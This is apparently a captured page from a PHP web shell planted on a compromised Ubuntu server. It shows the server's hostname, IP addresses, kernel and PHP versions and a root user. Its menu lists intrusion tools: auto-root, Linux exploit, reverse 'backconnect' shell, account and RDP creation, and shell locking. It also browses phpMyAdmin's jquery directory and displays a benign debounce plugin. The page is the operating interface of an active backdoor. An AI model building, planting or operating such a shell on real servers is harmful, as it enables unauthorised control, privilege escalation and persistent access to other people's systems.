Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
js /
jquery /
[ HOME SHELL ]
Name
Size
Permission
Action
MIT-LICENSE.txt
1.07
KB
-rw-r--r--
additional-methods.js
36.62
KB
-rw-r--r--
jquery-2.1.4.min.js
82.37
KB
-rw-r--r--
jquery-ui-1.11.4.min.js
234.79
KB
-rw-r--r--
jquery-ui-timepicker-addon.js
73.95
KB
-rw-r--r--
jquery.ba-hashchange-1.3.js
16.13
KB
-rw-r--r--
jquery.cookie.js
3.63
KB
-rw-r--r--
jquery.debounce-1.0.5.js
1.14
KB
-rw-r--r--
jquery.event.drag-2.2.js
12.53
KB
-rw-r--r--
jquery.fullscreen.js
1.61
KB
-rw-r--r--
jquery.mousewheel.js
8.08
KB
-rw-r--r--
jquery.sortableTable.js
8.07
KB
-rw-r--r--
jquery.svg.js
55.32
KB
-rw-r--r--
jquery.tablesorter.js
39.16
KB
-rw-r--r--
jquery.uitablefilter.js
3.4
KB
-rw-r--r--
jquery.validate.js
52.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.debounce-1.0.5.js
/** * Debounce and throttle function's decorator plugin 1.0.5 * * Copyright (c) 2009 Filatov Dmitry (alpha@zforms.ru) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ (function($) { $.extend({ debounce : function(fn, timeout, invokeAsap, ctx) { if(arguments.length == 3 && typeof invokeAsap != 'boolean') { ctx = invokeAsap; invokeAsap = false; } var timer; return function() { var args = arguments; ctx = ctx || this; invokeAsap && !timer && fn.apply(ctx, args); clearTimeout(timer); timer = setTimeout(function() { !invokeAsap && fn.apply(ctx, args); timer = null; }, timeout); }; }, throttle : function(fn, timeout, ctx) { var timer, args, needInvoke; return function() { args = arguments; needInvoke = true; ctx = ctx || this; if(!timer) { (function() { if(needInvoke) { fn.apply(ctx, args); needInvoke = false; timer = setTimeout(arguments.callee, timeout); } else { timer = null; } })(); } }; } }); })(jQuery);
Close